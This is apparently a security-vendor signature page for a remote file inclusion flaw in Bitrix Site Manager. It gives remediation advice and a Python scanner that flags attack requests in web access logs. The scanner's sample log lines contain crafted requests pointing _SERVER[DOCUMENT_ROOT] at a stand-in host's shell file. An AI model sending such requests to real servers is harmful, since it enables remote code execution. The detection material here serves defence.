PHP.BITRIX.Site.Manager.Remote.File.Inclusion

Description

This indicates an attack attempt to exploit a remote file inclusion vulnerability in Bitrix Site Manager.


Bitrix Site Manager is a PHP content management system used to create and manage web sites. A remote file inclusion vulnerability has been reported in it that may allow an attacker to execute arbitrary PHP code on the affected system. The flaw is caused by the application's failure to validate the _SERVER[DOCUMENT_ROOT] parameter passed to the admin/index.php script before using it in an include. To exploit it, an attacker sends a specially crafted URL to admin/index.php in which the _SERVER[DOCUMENT_ROOT] parameter points at a file hosted on a remote system; the script includes that file and executes the attacker's PHP code on the vulnerable server. Exploitation depends on the request parameter reaching the include path (typically via PHP's register_globals behaviour, which lets request parameters overwrite entries of $_SERVER) and on PHP being configured to open remote URLs in include statements.
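As an added illustration (this is not code from the signature page or from Bitrix), the following Python scans web-server access-log lines for the request pattern described above: a request to admin/index.php that supplies a _SERVER[DOCUMENT_ROOT] parameter. It decodes percent-encoded parameter names and values, distinguishes a remote URL in the parameter (inclusion attempt) from a plain local path (tampering with the parameter, worth reviewing but not by itself an inclusion of remote code), and ignores the parameter on other scripts. The host names, client addresses and log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (hypothetical hosts and addresses), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /bitrix/admin/index.php?lang=en HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://evil.example/shell.txt? HTTP/1.1" 200 77
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /bitrix/admin/index.php?_SERVER%5BDOCUMENT_ROOT%5D=HTTPS%3A%2F%2Fevil.example%2Fs.txt HTTP/1.1" 200 77
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=/var/www/html HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "POST /bitrix/admin/index.php HTTP/1.1" 200 512
10.0.0.10 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://evil.example/x HTTP/1.1" 404 10
"""

# Request line inside a common-log-format record: method, target, protocol.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# A value that would make include() fetch the file from a remote host.
REMOTE_SCHEME = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)
# Parameter name compared after decoding, case-insensitively.
TARGET_PARAM = "_server[document_root]"


def classify_request(target):
    """Classify one request-target string.

    Returns "rfi" when _SERVER[DOCUMENT_ROOT] carries a remote URL,
    "tamper" when the parameter is present with any other value,
    and None when the request does not match the pattern at all.
    """
    parts = urlsplit(target)
    # Only the vulnerable script is of interest for this signature.
    if not parts.path.lower().endswith("/admin/index.php"):
        return None
    verdict = None
    # parse_qsl percent-decodes both names and values, so
    # _SERVER%5BDOCUMENT_ROOT%5D is seen as _SERVER[DOCUMENT_ROOT].
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.strip().lower() != TARGET_PARAM:
            continue
        if REMOTE_SCHEME.match(value):
            return "rfi"
        verdict = "tamper"
    return verdict


def scan_log(text):
    """Return (line number, client address, verdict) for every matching record."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group("target"))
        if verdict:
            findings.append((lineno, line.split()[0], verdict))
    return findings


if __name__ == "__main__":
    for lineno, client, verdict in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {client} -> {verdict}")
```

The path filter keeps the check aligned with this signature; dropping it turns the scan into a generic detector for request parameters that try to overwrite $_SERVER entries, which is the underlying register_globals weakness and applies beyond Bitrix.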

Affected Products

Bitrix Site Manager 4.0.5 and prior versions.

Impact

Execution of arbitrary PHP code with the privileges of the web server process, leading to compromise of the affected system.

Recommended Actions

Upgrade to Bitrix Site Manager 4.0.9 or a later version. As defence in depth, disable register_globals in the PHP configuration so that request parameters cannot overwrite $_SERVER entries, and prevent include statements from opening remote URLs (allow_url_fopen, and allow_url_include on PHP versions that have it, set to Off).


Coverage

IPS (Regular DB)
IPS (Extended DB)